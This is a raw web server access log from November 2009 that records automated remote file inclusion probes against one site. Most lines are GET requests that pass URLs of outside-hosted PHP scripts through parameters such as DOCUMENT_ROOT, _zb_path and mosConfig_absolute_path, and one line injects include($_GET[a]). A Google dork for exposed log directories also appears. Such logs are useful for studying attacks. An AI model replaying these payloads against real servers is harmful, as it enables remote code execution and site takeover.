61.47.7.71 - - [01/Nov/2009:22:15:43 -0800] "GET /logs/access_090420.log/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:22:16:12 -0800] "GET /logs/access_090622.log/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:16:14 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:16:23 -0800] "GET /logs/access_090309.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:16:23 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:16:23 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:16:29 -0800] "GET /logs/access_090309.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:16:29 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:17:14 -0800] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:17:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:17:15 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:22:17:16 -0800] "GET /logs/access_090511.log//?view=page&pagename=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:22:17:16 -0800] "GET /?view=page&pagename=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:22:17:30 -0800] "GET /logs/access_090824.log//setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:22:18:00 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:22:18:14 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:18:33 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:18:35 -0800] "GET /logs/access_090309.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:18:37 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:18:38 -0800] "GET /logs/access_090309.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:19:19 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:19:23 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:22:19:43 -0800] "GET /logs/access_090511.log%20%20//?view=page&pagename=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:20:15 -0800] "GET /logs/access_090914.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:20:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:20:19 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:20:19 -0800] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:20:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:20:23 -0800] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:20:23 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:20:28 -0800] "GET /logs/access_090914.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:22:51 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:22:51 -0800] "GET /logs/access_090914.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:22:51 -0800] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:23:20 -0800] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:23:54 -0800] "GET /logs/access_090706.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:15 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:15 -0800] "GET /logs/access_090323.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:15 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:26 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:26 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:26 -0800] "GET /logs/access_091012.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:22:24:28 -0800] "GET /logs/access_091012.log/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:32 -0800] "GET /logs/access_090525.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:51 -0800] "GET /logs/access_090525.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:59 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:59 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:24:59 -0800] "GET /logs/access_091012.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:22:25:34 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:25:49 -0800] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:22:25:57 -0800] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:27:41 -0800] "GET /logs/access_090615.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:22:27:43 -0800] "GET /logs/access_090615.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:27:52 -0800] "GET /logs/access_090928.log//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:27:52 -0800] "GET /logs/access_090928.log//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:27:53 -0800] "GET /?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:27:53 -0800] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:27:53 -0800] "GET /?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:27:53 -0800] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:28:04 -0800] "GET /?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:28:04 -0800] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:28:04 -0800] "GET /logs/access_090928.log//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:28:23 -0800] "GET /logs/access_090928.log//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:28:23 -0800] "GET /?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:28:23 -0800] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:13 -0800] "GET /logs/access_090914.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:13 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:13 -0800] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:18 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:18 -0800] "GET /logs/access_090914.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:18 -0800] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:40 -0800] "GET /logs/access_090406.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:34:46 -0800] "GET /logs/access_090406.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:37:04 -0800] "GET /logs/access_090706.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:37:19 -0800] "GET /logs/access_090706.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:47:43 -0800] "GET /logs//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:47:43 -0800] "GET /zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:47:43 -0800] "GET /zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:47:43 -0800] "GET /logs/access_090824.log%20%20//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:47:43 -0800] "GET /logs/access_090824.log%20%20//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:47:43 -0800] "GET /logs//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.6.163.20 - - [01/Nov/2009:22:47:44 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.com.my/search?rlz=1C1GGLS_enMY291MY321&aq=f&sourceid=chrome&ie=UTF-8&q=access.log+%2B+scripts.logs+%2B+%22Index+of+%2Flogs%22+-html+-htm+-php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0" "www.galf.org"
61.6.163.21 - - [01/Nov/2009:22:47:45 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0" "www.galf.org"
61.6.163.21 - - [01/Nov/2009:22:47:46 -0800] "GET /logs/access.log HTTP/1.1" 200 190040 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0" "www.galf.org"
61.6.163.21 - - [01/Nov/2009:22:47:51 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0" "www.galf.org"
61.6.163.20 - - [01/Nov/2009:22:48:08 -0800] "GET /logs/access.log HTTP/1.1" 200 190509 "-" "Mozilla/8.0" "www.galf.org"
61.6.163.21 - - [01/Nov/2009:22:48:57 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0" "www.galf.org"
61.6.163.21 - - [01/Nov/2009:22:49:28 -0800] "GET /logs/access.log HTTP/1.1" 200 190849 "-" "Mozilla/8.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:22:50:40 -0800] "GET /s_e404.inc.php?DOCUMENT_ROOT=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:22:50:40 -0800] "GET /logs/access_091012.log//s_e404.inc.php?DOCUMENT_ROOT=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:22:50:40 -0800] "GET /logs//s_e404.inc.php?DOCUMENT_ROOT=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:22:50:40 -0800] "GET /logs/access_091012.log//s_e404.inc.php?DOCUMENT_ROOT=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:22:50:40 -0800] "GET /logs//s_e404.inc.php?DOCUMENT_ROOT=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:22:50:40 -0800] "GET /s_e404.inc.php?DOCUMENT_ROOT=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:51:33 -0800] "GET /logs/access.log%20%20//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:51:34 -0800] "GET /logs/access.log%20%20//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:21 -0800] "GET /s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:21 -0800] "GET /logs/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:21 -0800] "GET /logs/access_090706.log/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:24 -0800] "GET /logs/access_090824.log/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:30 -0800] "GET /logs/access_091012.log%20%20/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:30 -0800] "GET /logs/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:30 -0800] "GET /s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:34 -0800] "GET /s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:34 -0800] "GET /logs/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:34 -0800] "GET /logs/access_091012.log%20%20/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:37 -0800] "GET /logs/access_090706.log/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:37 -0800] "GET /logs/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:37 -0800] "GET /s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:52:37 -0800] "GET /logs/access_090824.log/s_common.inc.php??DOCUMENT_ROOT=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:22:54:21 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:22:54:21 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:22:54:21 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:55:17 -0800] "GET /logs/access_090824.log//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:22:55:49 -0800] "GET /logs/access_090629.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:22:56:37 -0800] "GET /logs/access.log//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [01/Nov/2009:22:57:29 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
